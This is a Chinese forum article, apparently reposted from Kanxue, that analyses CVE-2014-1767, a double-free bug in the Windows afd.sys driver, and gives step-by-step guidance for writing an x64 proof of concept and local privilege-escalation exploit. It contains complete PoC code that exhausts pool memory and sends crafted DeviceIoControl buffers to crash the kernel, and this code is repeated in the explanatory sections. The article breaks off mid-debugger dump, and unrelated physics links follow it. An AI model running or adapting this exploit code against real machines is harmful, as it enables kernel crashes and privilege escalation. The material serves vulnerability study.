Windows本地提权漏洞CVE-2014-1767分析及EXP编写指导
2022 年 03 月 31 日 11:41 wu
本文为看雪论坛精华文章
看雪论坛作者ID:ExploitCN
一
简介
1.1 写作目的
1.2 概述
1.3 非常重要的说明
① 本文侧重点在POC、EXP编写,从逆向与调试的角度引领你分析、编写POC、EXP;
② 本文是首篇针对该漏洞在x64平台下的分析、编写文章;
③ 全网最详细POC、EXP的编写说明;
④ EXP完全复用POC的代码;
⑤ 上传的EXP是我自己编写的。
二
POC分析
2.1 POC代码
ULONG CalcLength(){int BaseLength = 0x10000;unsigned __int16 VirtualAddress = 0x13371337;int FinalLength = 0x0;while (1){FinalLength = ((BaseLength & 0xFFF) + ((unsigned __int16)VirtualAddress & 0xFFF) + 0xFFF) >> 0xC;FinalLength = 8 * (FinalLength + (BaseLength>>0xC))+ 0x30;if (FinalLength == 0x100){break;}else{BaseLength += 1;continue;}}return BaseLength;}int main(){int nBottonRect = 0x2aaaaaa;while (true){HRGN hrgn = CreateRoundRectRgn(0, 0, 1, nBottonRect, 1, 1);if (hrgn==NULL){break;}printf("hrgn = %p\n", hrgn);}//这儿看IoAllocateMdl(ntoskrnl)DWORD length = CalcLength();printf("Length = %x\n", length);DWORD virtualAddress = 0x13371337;static BYTE inbuf1[0x40];memset(inbuf1, 0, sizeof(inbuf1));*(ULONG_PTR*)(inbuf1 + 0x20) = virtualAddress;*(ULONG*)(inbuf1 + 0x28) = length;*(ULONG*)(inbuf1 + 0x3c) = 1;static BYTE inbuf2[0x18];memset(inbuf2, 0, sizeof(inbuf2));*(ULONG*)(inbuf2) = 1;*(ULONG*)(inbuf2 + 0x8) = 0x0AAAAAAA;WSADATA WSAData;SOCKET s;sockaddr_in sa;int ierr;WSAStartup(0x2, &WSAData);s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);memset(&sa, 0, sizeof(sa));sa.sin_port = htons(135);sa.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");sa.sin_family = AF_INET;ierr = connect(s, (const struct sockaddr*)&sa, sizeof(sa));DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0x40, NULL, 0, NULL, NULL);DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0x18, NULL, 0, NULL, NULL);}
2.2 POC运行结果
运行上面POC代码,系统出现蓝屏后的windbg调试结果见上图(上图并不是原始输出,我把一些不重要的数据删除了)。从第一个红框可以看出:
① 这是一个双重释放漏洞;
② 双重释放的代码在afd!AfdReturnTpinfo+0xe7。
可见,在afd!AfdReturnTpinfo+0xe1处,是IoFreeMdl函数,它是用来释放Mdl指针的。那么,释放完之后,有没有对指针进行清零处理?我们来看看反编译代码:
根据上面分析可知,IoFreeMdl肯定被执行了两次,那么,在后面我们进行分析时,可以在此处下断点,看这块内存是怎么变化的。现在,我们来看看,程序为什么会调用IoFreeMdl两次。
2.3 漏洞产生的根本原因
DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0x40, NULL, 0, NULL, NULL);
时,afd!afdTransmitFile+0x2CD调用MmProbeAndLockPages函数判断的地址,是POC里面指定的0x13371337这个非法地址,所以会出现异常,如下图所示:
DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0x18, NULL, 0, NULL, NULL);
因为POC里面指定的内存空间是0x0AAAAAAA*0x18,在afd!afdTransmitPackets中调用afd!AfdTliGetTpInfo,执行ExAllocatePoolwithQutaTag时失败后,会跳到AfdReturnTpinfo函数执行,如下图:
三
x64平台POC编写指导
3.1 第一阶段:消耗系统内存
int nBottonRect = 0x2aaaaaa;while (true){HRGN hrgn = CreateRoundRectRgn(0, 0, 1, nBottonRect, 1, 1);if (hrgn==NULL){break;}printf("hrgn = %p\n", hrgn);}
3.2 第二阶段:构造Inbuff1
3.2.1 Inbuff1的输入长度构造
现在,我们需要看看IoAllocateMdl是如何分配内存空间的,反编译nt!IoAllocateMdl,可得:
我们的CalcLength函数,就是为了输入Length,得到一个固定的内存0x100。基本思路是:
① 初始Length从0x10000开始;
② ViRtualAddress是非法地址0x13371337;
ULONG CalcLength(){int BaseLength = 0x10000;unsigned __int16 VirtualAddress = 0x13371337;int FinalLength = 0x0;while (1){FinalLength = ((BaseLength & 0xFFF) + ((unsigned__int16)VirtualAddress & 0xFFF) + 0xFFF) >> 0xC;FinalLength = 8 * (FinalLength + (BaseLength>>0xC))+ 0x30;if (FinalLength == 0x100){break;}else{BaseLength += 1;continue;}}return BaseLength;}
3.2.2 Inbuff1的参数构造
__fastcall AfdTransmitFile(PIRP pIRP, PIO_STACK_LOCATION pIoStackLocation)__fastcall AfdTransmitPackets(PIRP pIrp, PIO_STACK_LOCATION pIoStackLocation)
kd> dt _io_stack_locationntdll!_IO_STACK_LOCATION+0x000 MajorFunction : UChar+0x001 MinorFunction : UChar+0x002 Flags : UChar+0x003 Control : UChar+0x008 Parameters ://struct{// +0x008 ULONG OutputBufferLength;// +0x010 POINTER_ALIGNMENT InputBufferLength;// +0x018 POINTER_ALIGNMENT IoControlCode;// +0x020 Type3InputBuffer/
最新文章
- · 高三如何快速提高物理成绩
- · 安培力的方向判断
- · 高中物理公式总结表
- · 摩擦起电的原因
- · 平衡力和相互作用力的区别
- · 风力发电一圈能发多少电 风力发电原理